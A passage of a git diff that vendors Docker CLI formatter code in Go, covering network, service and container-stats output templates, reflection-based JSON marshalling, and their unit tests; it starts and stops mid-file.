{{.ID}}` + } + return `network_id: {{.ID}}\nname: {{.Name}}\ndriver: {{.Driver}}\nscope: {{.Scope}}\n` + } + return Format(source) +} + +// NetworkWrite writes the context +func NetworkWrite(ctx Context, networks []types.NetworkResource) error { + render := func(format func(subContext subContext) error) error { + for _, network := range networks { + networkCtx := &networkContext{trunc: ctx.Trunc, n: network} + if err := format(networkCtx); err != nil { + return err + } + } + return nil + } + return ctx.Write(&networkContext{}, render) +} + +type networkContext struct { + HeaderContext + trunc bool + n types.NetworkResource +} + +func (c *networkContext) MarshalJSON() ([]byte, error) { + return marshalJSON(c) +} + +func (c *networkContext) ID() string { + c.AddHeader(networkIDHeader) + if c.trunc { + return stringid.TruncateID(c.n.ID) + } + return c.n.ID +} + +func (c *networkContext) Name() string { + c.AddHeader(nameHeader) + return c.n.Name +} + +func (c *networkContext) Driver() string { + c.AddHeader(driverHeader) + return c.n.Driver +} + +func (c *networkContext) Scope() string { + c.AddHeader(scopeHeader) + return c.n.Scope +} + +func (c *networkContext) IPv6() string { + c.AddHeader(ipv6Header) + return fmt.Sprintf("%v", c.n.EnableIPv6) +} + +func (c *networkContext) Internal() string { + c.AddHeader(internalHeader) + return fmt.Sprintf("%v", c.n.Internal) +} + +func (c *networkContext) Labels() string { + c.AddHeader(labelsHeader) + if c.n.Labels == nil { + return "" + } + + var joinLabels []string + for k, v := range c.n.Labels { + joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) + } + return strings.Join(joinLabels, ",") +} + +func (c *networkContext) Label(name string) string { + n := strings.Split(name, ".") + r := strings.NewReplacer("-", " ", "_", " ") + h := r.Replace(n[len(n)-1]) + + c.AddHeader(h) + + if c.n.Labels == nil { + return "" + } + return c.n.Labels[name] +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/network_test.go b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go new file mode 100644 index 0000000000..b40a534eed --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/network_test.go @@ -0,0 +1,208 @@ +package formatter + +import ( + "bytes" + "encoding/json" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestNetworkContext(t *testing.T) { + networkID := stringid.GenerateRandomID() + + var ctx networkContext + cases := []struct { + networkCtx networkContext + expValue string + expHeader string + call func() string + }{ + {networkContext{ + n: types.NetworkResource{ID: networkID}, + trunc: false, + }, networkID, networkIDHeader, ctx.ID}, + {networkContext{ + n: types.NetworkResource{ID: networkID}, + trunc: true, + }, stringid.TruncateID(networkID), networkIDHeader, ctx.ID}, + {networkContext{ + n: types.NetworkResource{Name: "network_name"}, + }, "network_name", nameHeader, ctx.Name}, + {networkContext{ + n: types.NetworkResource{Driver: "driver_name"}, + }, "driver_name", driverHeader, ctx.Driver}, + {networkContext{ + n: types.NetworkResource{EnableIPv6: true}, + }, "true", ipv6Header, ctx.IPv6}, + {networkContext{ + n: types.NetworkResource{EnableIPv6: false}, + }, "false", ipv6Header, ctx.IPv6}, + {networkContext{ + n: types.NetworkResource{Internal: true}, + }, "true", internalHeader, ctx.Internal}, + {networkContext{ + n: types.NetworkResource{Internal: false}, + }, "false", internalHeader, ctx.Internal}, + {networkContext{ + n: types.NetworkResource{}, + }, "", labelsHeader, ctx.Labels}, + {networkContext{ + n: types.NetworkResource{Labels: map[string]string{"label1": "value1", "label2": "value2"}}, + }, "label1=value1,label2=value2", labelsHeader, ctx.Labels}, + } + + for _, c := range cases { + ctx = c.networkCtx + v := c.call() + if strings.Contains(v, ",") { + compareMultipleValues(t, v, c.expValue) + } else if v != c.expValue { + t.Fatalf("Expected %s, was %s\n", c.expValue, v) + } + + h := ctx.FullHeader() + if h != c.expHeader { + t.Fatalf("Expected %s, was %s\n", c.expHeader, h) + } + } +} + +func TestNetworkContextWrite(t *testing.T) { + cases := []struct { + context Context + expected string + }{ + + // Errors + { + Context{Format: "{{InvalidFunction}}"}, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + Context{Format: "{{nil}}"}, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + // Table format + { + Context{Format: NewNetworkFormat("table", false)}, + `NETWORK ID NAME DRIVER SCOPE +networkID1 foobar_baz foo local +networkID2 foobar_bar bar local +`, + }, + { + Context{Format: NewNetworkFormat("table", true)}, + `networkID1 +networkID2 +`, + }, + { + Context{Format: NewNetworkFormat("table {{.Name}}", false)}, + `NAME +foobar_baz +foobar_bar +`, + }, + { + Context{Format: NewNetworkFormat("table {{.Name}}", true)}, + `NAME +foobar_baz +foobar_bar +`, + }, + // Raw Format + { + Context{Format: NewNetworkFormat("raw", false)}, + `network_id: networkID1 +name: foobar_baz +driver: foo +scope: local + +network_id: networkID2 +name: foobar_bar +driver: bar +scope: local + +`, + }, + { + Context{Format: NewNetworkFormat("raw", true)}, + `network_id: networkID1 +network_id: networkID2 +`, + }, + // Custom Format + { + Context{Format: NewNetworkFormat("{{.Name}}", false)}, + `foobar_baz +foobar_bar +`, + }, + } + + for _, testcase := range cases { + networks := []types.NetworkResource{ + {ID: "networkID1", Name: "foobar_baz", Driver: "foo", Scope: "local"}, + {ID: "networkID2", Name: "foobar_bar", Driver: "bar", Scope: "local"}, + } + out := bytes.NewBufferString("") + testcase.context.Output = out + err := NetworkWrite(testcase.context, networks) + if err != nil { + assert.Error(t, err, testcase.expected) + } else { + assert.Equal(t, out.String(), testcase.expected) + } + } +} + +func TestNetworkContextWriteJSON(t *testing.T) { + networks := []types.NetworkResource{ + {ID: "networkID1", Name: "foobar_baz"}, + {ID: "networkID2", Name: "foobar_bar"}, + } + expectedJSONs := []map[string]interface{}{ + {"Driver": "", "ID": "networkID1", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_baz", "Scope": ""}, + {"Driver": "", "ID": "networkID2", "IPv6": "false", "Internal": "false", "Labels": "", "Name": "foobar_bar", "Scope": ""}, + } + + out := bytes.NewBufferString("") + err := NetworkWrite(Context{Format: "{{json .}}", Output: out}, networks) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var m map[string]interface{} + if err := json.Unmarshal([]byte(line), &m); err != nil { + t.Fatal(err) + } + assert.DeepEqual(t, m, expectedJSONs[i]) + } +} + +func TestNetworkContextWriteJSONField(t *testing.T) { + networks := []types.NetworkResource{ + {ID: "networkID1", Name: "foobar_baz"}, + {ID: "networkID2", Name: "foobar_bar"}, + } + out := bytes.NewBufferString("") + err := NetworkWrite(Context{Format: "{{json .ID}}", Output: out}, networks) + if err != nil { + t.Fatal(err) + } + for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { + t.Logf("Output: line %d: %s", i, line) + var s string + if err := json.Unmarshal([]byte(line), &s); err != nil { + t.Fatal(err) + } + assert.Equal(t, s, networks[i].ID) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go new file mode 100644 index 0000000000..d1d8737d21 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/reflect.go @@ -0,0 +1,65 @@ +package formatter + +import ( + "encoding/json" + "fmt" + "reflect" + "unicode" +) + +func marshalJSON(x interface{}) ([]byte, error) { + m, err := marshalMap(x) + if err != nil { + return nil, err + } + return json.Marshal(m) +} + +// marshalMap marshals x to map[string]interface{} +func marshalMap(x interface{}) (map[string]interface{}, error) { + val := reflect.ValueOf(x) + if val.Kind() != reflect.Ptr { + return nil, fmt.Errorf("expected a pointer to a struct, got %v", val.Kind()) + } + if val.IsNil() { + return nil, fmt.Errorf("expxected a pointer to a struct, got nil pointer") + } + valElem := val.Elem() + if valElem.Kind() != reflect.Struct { + return nil, fmt.Errorf("expected a pointer to a struct, got a pointer to %v", valElem.Kind()) + } + typ := val.Type() + m := make(map[string]interface{}) + for i := 0; i < val.NumMethod(); i++ { + k, v, err := marshalForMethod(typ.Method(i), val.Method(i)) + if err != nil { + return nil, err + } + if k != "" { + m[k] = v + } + } + return m, nil +} + +var unmarshallableNames = map[string]struct{}{"FullHeader": {}} + +// marshalForMethod returns the map key and the map value for marshalling the method. +// It returns ("", nil, nil) for valid but non-marshallable parameter. (e.g. "unexportedFunc()") +func marshalForMethod(typ reflect.Method, val reflect.Value) (string, interface{}, error) { + if val.Kind() != reflect.Func { + return "", nil, fmt.Errorf("expected func, got %v", val.Kind()) + } + name, numIn, numOut := typ.Name, val.Type().NumIn(), val.Type().NumOut() + _, blackListed := unmarshallableNames[name] + // FIXME: In text/template, (numOut == 2) is marshallable, + // if the type of the second param is error. + marshallable := unicode.IsUpper(rune(name[0])) && !blackListed && + numIn == 0 && numOut == 1 + if !marshallable { + return "", nil, nil + } + result := val.Call(make([]reflect.Value, numIn)) + intf := result[0].Interface() + return name, intf, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go new file mode 100644 index 0000000000..e547b18411 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/reflect_test.go @@ -0,0 +1,66 @@ +package formatter + +import ( + "reflect" + "testing" +) + +type dummy struct { +} + +func (d *dummy) Func1() string { + return "Func1" +} + +func (d *dummy) func2() string { + return "func2(should not be marshalled)" +} + +func (d *dummy) Func3() (string, int) { + return "Func3(should not be marshalled)", -42 +} + +func (d *dummy) Func4() int { + return 4 +} + +type dummyType string + +func (d *dummy) Func5() dummyType { + return dummyType("Func5") +} + +func (d *dummy) FullHeader() string { + return "FullHeader(should not be marshalled)" +} + +var dummyExpected = map[string]interface{}{ + "Func1": "Func1", + "Func4": 4, + "Func5": dummyType("Func5"), +} + +func TestMarshalMap(t *testing.T) { + d := dummy{} + m, err := marshalMap(&d) + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(dummyExpected, m) { + t.Fatalf("expected %+v, got %+v", + dummyExpected, m) + } +} + +func TestMarshalMapBad(t *testing.T) { + if _, err := marshalMap(nil); err == nil { + t.Fatal("expected an error (argument is nil)") + } + if _, err := marshalMap(dummy{}); err == nil { + t.Fatal("expected an error (argument is non-pointer)") + } + x := 42 + if _, err := marshalMap(&x); err == nil { + t.Fatal("expected an error (argument is a pointer to non-struct)") + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/service.go b/vendor/github.com/docker/docker/cli/command/formatter/service.go new file mode 100644 index 0000000000..aaa78386cb --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/service.go @@ -0,0 +1,322 @@ +package formatter + +import ( + "fmt" + "strings" + "time" + + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command/inspect" + units "github.com/docker/go-units" +) + +const serviceInspectPrettyTemplate Format = ` +ID: {{.ID}} +Name: {{.Name}} +{{- if .Labels }} +Labels: +{{- range $k, $v := .Labels }} + {{ $k }}{{if $v }}={{ $v }}{{ end }} +{{- end }}{{ end }} +Service Mode: +{{- if .IsModeGlobal }} Global +{{- else if .IsModeReplicated }} Replicated +{{- if .ModeReplicatedReplicas }} + Replicas: {{ .ModeReplicatedReplicas }} +{{- end }}{{ end }} +{{- if .HasUpdateStatus }} +UpdateStatus: + State: {{ .UpdateStatusState }} + Started: {{ .UpdateStatusStarted }} +{{- if .UpdateIsCompleted }} + Completed: {{ .UpdateStatusCompleted }} +{{- end }} + Message: {{ .UpdateStatusMessage }} +{{- end }} +Placement: +{{- if .TaskPlacementConstraints -}} + Contraints: {{ .TaskPlacementConstraints }} +{{- end }} +{{- if .HasUpdateConfig }} +UpdateConfig: + Parallelism: {{ .UpdateParallelism }} +{{- if .HasUpdateDelay}} + Delay: {{ .UpdateDelay }} +{{- end }} + On failure: {{ .UpdateOnFailure }} +{{- if .HasUpdateMonitor}} + Monitoring Period: {{ .UpdateMonitor }} +{{- end }} + Max failure ratio: {{ .UpdateMaxFailureRatio }} +{{- end }} +ContainerSpec: + Image: {{ .ContainerImage }} +{{- if .ContainerArgs }} + Args: {{ range $arg := .ContainerArgs }}{{ $arg }} {{ end }} +{{- end -}} +{{- if .ContainerEnv }} + Env: {{ range $env := .ContainerEnv }}{{ $env }} {{ end }} +{{- end -}} +{{- if .ContainerWorkDir }} + Dir: {{ .ContainerWorkDir }} +{{- end -}} +{{- if .ContainerUser }} + User: {{ .ContainerUser }} +{{- end }} +{{- if .ContainerMounts }} +Mounts: +{{- end }} +{{- range $mount := .ContainerMounts }} + Target = {{ $mount.Target }} + Source = {{ $mount.Source }} + ReadOnly = {{ $mount.ReadOnly }} + Type = {{ $mount.Type }} +{{- end -}} +{{- if .HasResources }} +Resources: +{{- if .HasResourceReservations }} + Reservations: +{{- if gt .ResourceReservationNanoCPUs 0.0 }} + CPU: {{ .ResourceReservationNanoCPUs }} +{{- end }} +{{- if .ResourceReservationMemory }} + Memory: {{ .ResourceReservationMemory }} +{{- end }}{{ end }} +{{- if .HasResourceLimits }} + Limits: +{{- if gt .ResourceLimitsNanoCPUs 0.0 }} + CPU: {{ .ResourceLimitsNanoCPUs }} +{{- end }} +{{- if .ResourceLimitMemory }} + Memory: {{ .ResourceLimitMemory }} +{{- end }}{{ end }}{{ end }} +{{- if .Networks }} +Networks: +{{- range $network := .Networks }} {{ $network }}{{ end }} {{ end }} +Endpoint Mode: {{ .EndpointMode }} +{{- if .Ports }} +Ports: +{{- range $port := .Ports }} + PublishedPort {{ $port.PublishedPort }} + Protocol = {{ $port.Protocol }} + TargetPort = {{ $port.TargetPort }} +{{- end }} {{ end -}} +` + +// NewServiceFormat returns a Format for rendering using a Context +func NewServiceFormat(source string) Format { + switch source { + case PrettyFormatKey: + return serviceInspectPrettyTemplate + default: + return Format(strings.TrimPrefix(source, RawFormatKey)) + } +} + +// ServiceInspectWrite renders the context for a list of services +func ServiceInspectWrite(ctx Context, refs []string, getRef inspect.GetRefFunc) error { + if ctx.Format != serviceInspectPrettyTemplate { + return inspect.Inspect(ctx.Output, refs, string(ctx.Format), getRef) + } + render := func(format func(subContext subContext) error) error { + for _, ref := range refs { + serviceI, _, err := getRef(ref) + if err != nil { + return err + } + service, ok := serviceI.(swarm.Service) + if !ok { + return fmt.Errorf("got wrong object to inspect") + } + if err := format(&serviceInspectContext{Service: service}); err != nil { + return err + } + } + return nil + } + return ctx.Write(&serviceInspectContext{}, render) +} + +type serviceInspectContext struct { + swarm.Service + subContext +} + +func (ctx *serviceInspectContext) MarshalJSON() ([]byte, error) { + return marshalJSON(ctx) +} + +func (ctx *serviceInspectContext) ID() string { + return ctx.Service.ID +} + +func (ctx *serviceInspectContext) Name() string { + return ctx.Service.Spec.Name +} + +func (ctx *serviceInspectContext) Labels() map[string]string { + return ctx.Service.Spec.Labels +} + +func (ctx *serviceInspectContext) IsModeGlobal() bool { + return ctx.Service.Spec.Mode.Global != nil +} + +func (ctx *serviceInspectContext) IsModeReplicated() bool { + return ctx.Service.Spec.Mode.Replicated != nil +} + +func (ctx *serviceInspectContext) ModeReplicatedReplicas() *uint64 { + return ctx.Service.Spec.Mode.Replicated.Replicas +} + +func (ctx *serviceInspectContext) HasUpdateStatus() bool { + return ctx.Service.UpdateStatus.State != "" +} + +func (ctx *serviceInspectContext) UpdateStatusState() swarm.UpdateState { + return ctx.Service.UpdateStatus.State +} + +func (ctx *serviceInspectContext) UpdateStatusStarted() string { + return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.StartedAt)) +} + +func (ctx *serviceInspectContext) UpdateIsCompleted() bool { + return ctx.Service.UpdateStatus.State == swarm.UpdateStateCompleted +} + +func (ctx *serviceInspectContext) UpdateStatusCompleted() string { + return units.HumanDuration(time.Since(ctx.Service.UpdateStatus.CompletedAt)) +} + +func (ctx *serviceInspectContext) UpdateStatusMessage() string { + return ctx.Service.UpdateStatus.Message +} + +func (ctx *serviceInspectContext) TaskPlacementConstraints() []string { + if ctx.Service.Spec.TaskTemplate.Placement != nil { + return ctx.Service.Spec.TaskTemplate.Placement.Constraints + } + return nil +} + +func (ctx *serviceInspectContext) HasUpdateConfig() bool { + return ctx.Service.Spec.UpdateConfig != nil +} + +func (ctx *serviceInspectContext) UpdateParallelism() uint64 { + return ctx.Service.Spec.UpdateConfig.Parallelism +} + +func (ctx *serviceInspectContext) HasUpdateDelay() bool { + return ctx.Service.Spec.UpdateConfig.Delay.Nanoseconds() > 0 +} + +func (ctx *serviceInspectContext) UpdateDelay() time.Duration { + return ctx.Service.Spec.UpdateConfig.Delay +} + +func (ctx *serviceInspectContext) UpdateOnFailure() string { + return ctx.Service.Spec.UpdateConfig.FailureAction +} + +func (ctx *serviceInspectContext) HasUpdateMonitor() bool { + return ctx.Service.Spec.UpdateConfig.Monitor.Nanoseconds() > 0 +} + +func (ctx *serviceInspectContext) UpdateMonitor() time.Duration { + return ctx.Service.Spec.UpdateConfig.Monitor +} + +func (ctx *serviceInspectContext) UpdateMaxFailureRatio() float32 { + return ctx.Service.Spec.UpdateConfig.MaxFailureRatio +} + +func (ctx *serviceInspectContext) ContainerImage() string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Image +} + +func (ctx *serviceInspectContext) ContainerArgs() []string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Args +} + +func (ctx *serviceInspectContext) ContainerEnv() []string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Env +} + +func (ctx *serviceInspectContext) ContainerWorkDir() string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Dir +} + +func (ctx *serviceInspectContext) ContainerUser() string { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.User +} + +func (ctx *serviceInspectContext) ContainerMounts() []mounttypes.Mount { + return ctx.Service.Spec.TaskTemplate.ContainerSpec.Mounts +} + +func (ctx *serviceInspectContext) HasResources() bool { + return ctx.Service.Spec.TaskTemplate.Resources != nil +} + +func (ctx *serviceInspectContext) HasResourceReservations() bool { + if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Reservations == nil { + return false + } + return ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes > 0 +} + +func (ctx *serviceInspectContext) ResourceReservationNanoCPUs() float64 { + if ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs == 0 { + return float64(0) + } + return float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs) / 1e9 +} + +func (ctx *serviceInspectContext) ResourceReservationMemory() string { + if ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes == 0 { + return "" + } + return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes)) +} + +func (ctx *serviceInspectContext) HasResourceLimits() bool { + if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Limits == nil { + return false + } + return ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes > 0 +} + +func (ctx *serviceInspectContext) ResourceLimitsNanoCPUs() float64 { + return float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs) / 1e9 +} + +func (ctx *serviceInspectContext) ResourceLimitMemory() string { + if ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes == 0 { + return "" + } + return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes)) +} + +func (ctx *serviceInspectContext) Networks() []string { + var out []string + for _, n := range ctx.Service.Spec.Networks { + out = append(out, n.Target) + } + return out +} + +func (ctx *serviceInspectContext) EndpointMode() string { + if ctx.Service.Spec.EndpointSpec == nil { + return "" + } + + return string(ctx.Service.Spec.EndpointSpec.Mode) +} + +func (ctx *serviceInspectContext) Ports() []swarm.PortConfig { + return ctx.Service.Endpoint.Ports +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats.go b/vendor/github.com/docker/docker/cli/command/formatter/stats.go new file mode 100644 index 0000000000..7997f996d8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/stats.go @@ -0,0 +1,211 @@ +package formatter + +import ( + "fmt" + "sync" + + units "github.com/docker/go-units" +) + +const ( + winOSType = "windows" + defaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.MemPerc}}\t{{.NetIO}}\t{{.BlockIO}}\t{{.PIDs}}" + winDefaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.NetIO}}\t{{.BlockIO}}" + + containerHeader = "CONTAINER" + cpuPercHeader = "CPU %" + netIOHeader = "NET I/O" + blockIOHeader = "BLOCK I/O" + memPercHeader = "MEM %" // Used only on Linux + winMemUseHeader = "PRIV WORKING SET" // Used only on Windows + memUseHeader = "MEM USAGE / LIMIT" // Used only on Linux + pidsHeader = "PIDS" // Used only on Linux +) + +// StatsEntry represents represents the statistics data collected from a container +type StatsEntry struct { + Container string + Name string + ID string + CPUPercentage float64 + Memory float64 // On Windows this is the private working set + MemoryLimit float64 // Not used on Windows + MemoryPercentage float64 // Not used on Windows + NetworkRx float64 + NetworkTx float64 + BlockRead float64 + BlockWrite float64 + PidsCurrent uint64 // Not used on Windows + IsInvalid bool + OSType string +} + +// ContainerStats represents an entity to store containers statistics synchronously +type ContainerStats struct { + mutex sync.Mutex + StatsEntry + err error +} + +// GetError returns the container statistics error. +// This is used to determine whether the statistics are valid or not +func (cs *ContainerStats) GetError() error { + cs.mutex.Lock() + defer cs.mutex.Unlock() + return cs.err +} + +// SetErrorAndReset zeroes all the container statistics and store the error. +// It is used when receiving time out error during statistics collecting to reduce lock overhead +func (cs *ContainerStats) SetErrorAndReset(err error) { + cs.mutex.Lock() + defer cs.mutex.Unlock() + cs.CPUPercentage = 0 + cs.Memory = 0 + cs.MemoryPercentage = 0 + cs.MemoryLimit = 0 + cs.NetworkRx = 0 + cs.NetworkTx = 0 + cs.BlockRead = 0 + cs.BlockWrite = 0 + cs.PidsCurrent = 0 + cs.err = err + cs.IsInvalid = true +} + +// SetError sets container statistics error +func (cs *ContainerStats) SetError(err error) { + cs.mutex.Lock() + defer cs.mutex.Unlock() + cs.err = err + if err != nil { + cs.IsInvalid = true + } +} + +// SetStatistics set the container statistics +func (cs *ContainerStats) SetStatistics(s StatsEntry) { + cs.mutex.Lock() + defer cs.mutex.Unlock() + s.Container = cs.Container + s.OSType = cs.OSType + cs.StatsEntry = s +} + +// GetStatistics returns container statistics with other meta data such as the container name +func (cs *ContainerStats) GetStatistics() StatsEntry { + cs.mutex.Lock() + defer cs.mutex.Unlock() + return cs.StatsEntry +} + +// NewStatsFormat returns a format for rendering an CStatsContext +func NewStatsFormat(source, osType string) Format { + if source == TableFormatKey { + if osType == winOSType { + return Format(winDefaultStatsTableFormat) + } + return Format(defaultStatsTableFormat) + } + return Format(source) +} + +// NewContainerStats returns a new ContainerStats entity and sets in it the given name +func NewContainerStats(container, osType string) *ContainerStats { + return &ContainerStats{ + StatsEntry: StatsEntry{Container: container, OSType: osType}, + } +} + +// ContainerStatsWrite renders the context for a list of containers statistics +func ContainerStatsWrite(ctx Context, containerStats []StatsEntry) error { + render := func(format func(subContext subContext) error) error { + for _, cstats := range containerStats { + containerStatsCtx := &containerStatsContext{ + s: cstats, + } + if err := format(containerStatsCtx); err != nil { + return err + } + } + return nil + } + return ctx.Write(&containerStatsContext{}, render) +} + +type containerStatsContext struct { + HeaderContext + s StatsEntry +} + +func (c *containerStatsContext) Container() string { + c.AddHeader(containerHeader) + return c.s.Container +} + +func (c *containerStatsContext) Name() string { + c.AddHeader(nameHeader) + name := c.s.Name[1:] + return name +} + +func (c *containerStatsContext) ID() string { + c.AddHeader(containerIDHeader) + return c.s.ID +} + +func (c *containerStatsContext) CPUPerc() string { + c.AddHeader(cpuPercHeader) + if c.s.IsInvalid { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%.2f%%", c.s.CPUPercentage) +} + +func (c *containerStatsContext) MemUsage() string { + header := memUseHeader + if c.s.OSType == winOSType { + header = winMemUseHeader + } + c.AddHeader(header) + if c.s.IsInvalid { + return fmt.Sprintf("-- / --") + } + if c.s.OSType == winOSType { + return fmt.Sprintf("%s", units.BytesSize(c.s.Memory)) + } + return fmt.Sprintf("%s / %s", units.BytesSize(c.s.Memory), units.BytesSize(c.s.MemoryLimit)) +} + +func (c *containerStatsContext) MemPerc() string { + header := memPercHeader + c.AddHeader(header) + if c.s.IsInvalid || c.s.OSType == winOSType { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%.2f%%", c.s.MemoryPercentage) +} + +func (c *containerStatsContext) NetIO() string { + c.AddHeader(netIOHeader) + if c.s.IsInvalid { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.NetworkRx, 3), units.HumanSizeWithPrecision(c.s.NetworkTx, 3)) +} + +func (c *containerStatsContext) BlockIO() string { + c.AddHeader(blockIOHeader) + if c.s.IsInvalid { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.BlockRead, 3), units.HumanSizeWithPrecision(c.s.BlockWrite, 3)) +} + +func (c *containerStatsContext) PIDs() string { + c.AddHeader(pidsHeader) + if c.s.IsInvalid || c.s.OSType == winOSType { + return fmt.Sprintf("--") + } + return fmt.Sprintf("%d", c.s.PidsCurrent) +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go new file mode 100644 index 0000000000..d5a17cc70e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go @@ -0,0 +1,228 @@ +package formatter + +import ( + "bytes" + "testing" + + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestContainerStatsContext(t *testing.T) { + containerID := stringid.GenerateRandomID() + + var ctx containerStatsContext + tt := []struct { + stats StatsEntry + expValue string + expHeader string + call func() string + }{ + {StatsEntry{Container: containerID}, containerID, containerHeader, ctx.Container}, + {StatsEntry{CPUPercentage: 5.5}, "5.50%", cpuPercHeader, ctx.CPUPerc}, + {StatsEntry{CPUPercentage: 5.5, IsInvalid: true}, "--", cpuPercHeader, ctx.CPUPerc}, + {StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3}, "0.31 B / 12.3 B", netIOHeader, ctx.NetIO}, + {StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3, IsInvalid: true}, "--", netIOHeader, ctx.NetIO}, + {StatsEntry{BlockRead: 0.1, BlockWrite: 2.3}, "0.1 B / 2.3 B", blockIOHeader, ctx.BlockIO}, + {StatsEntry{BlockRead: 0.1, BlockWrite: 2.3, IsInvalid: true}, "--", blockIOHeader, ctx.BlockIO}, + {StatsEntry{MemoryPercentage: 10.2}, "10.20%", memPercHeader, ctx.MemPerc}, + {StatsEntry{MemoryPercentage: 10.2, IsInvalid: true}, "--", memPercHeader, ctx.MemPerc}, + {StatsEntry{MemoryPercentage: 10.2, OSType: "windows"}, "--", memPercHeader, ctx.MemPerc}, + {StatsEntry{Memory: 24, MemoryLimit: 30}, "24 B / 30 B", memUseHeader, ctx.MemUsage}, + {StatsEntry{Memory: 24, MemoryLimit: 30, IsInvalid: true}, "-- / --", memUseHeader, ctx.MemUsage}, + {StatsEntry{Memory: 24, MemoryLimit: 30, OSType: "windows"}, "24 B", winMemUseHeader, ctx.MemUsage}, + {StatsEntry{PidsCurrent: 10}, "10", pidsHeader, ctx.PIDs}, + {StatsEntry{PidsCurrent: 10, IsInvalid: true}, "--", pidsHeader, ctx.PIDs}, + {StatsEntry{PidsCurrent: 10, OSType: "windows"}, "--", pidsHeader, ctx.PIDs}, + } + + for _, te := range tt { + ctx = containerStatsContext{s: te.stats} + if v := te.call(); v != te.expValue { + t.Fatalf("Expected %q, got %q", te.expValue, v) + } + + h := ctx.FullHeader() + if h != te.expHeader { + t.Fatalf("Expected %q, got %q", te.expHeader, h) + } + } +} + +func TestContainerStatsContextWrite(t *testing.T) { + tt := []struct { + context Context + expected string + }{ + { + Context{Format: "{{InvalidFunction}}"}, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + Context{Format: "{{nil}}"}, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + { + Context{Format: "table {{.MemUsage}}"}, + `MEM USAGE / LIMIT +20 B / 20 B +-- / -- +`, + }, + { + Context{Format: "{{.Container}} {{.CPUPerc}}"}, + `container1 20.00% +container2 -- +`, + }, + } + + for _, te := range tt { + stats := []StatsEntry{ + { + Container: "container1", + CPUPercentage: 20, + Memory: 20, + MemoryLimit: 20, + MemoryPercentage: 20, + NetworkRx: 20, + NetworkTx: 20, + BlockRead: 20, + BlockWrite: 20, + PidsCurrent: 2, + IsInvalid: false, + OSType: "linux", + }, + { + Container: "container2", + CPUPercentage: 30, + Memory: 30, + MemoryLimit: 30, + MemoryPercentage: 30, + NetworkRx: 30, + NetworkTx: 30, + BlockRead: 30, + BlockWrite: 30, + PidsCurrent: 3, + IsInvalid: true, + OSType: "linux", + }, + } + var out bytes.Buffer + te.context.Output = &out + err := ContainerStatsWrite(te.context, stats) + if err != nil { + assert.Error(t, err, te.expected) + } else { + assert.Equal(t, out.String(), te.expected) + } + } +} + +func TestContainerStatsContextWriteWindows(t *testing.T) { + tt := []struct { + context Context + expected string + }{ + { + Context{Format: "table {{.MemUsage}}"}, + `PRIV WORKING SET +20 B +-- / -- +`, + }, + { + Context{Format: "{{.Container}} {{.CPUPerc}}"}, + `container1 20.00% +container2 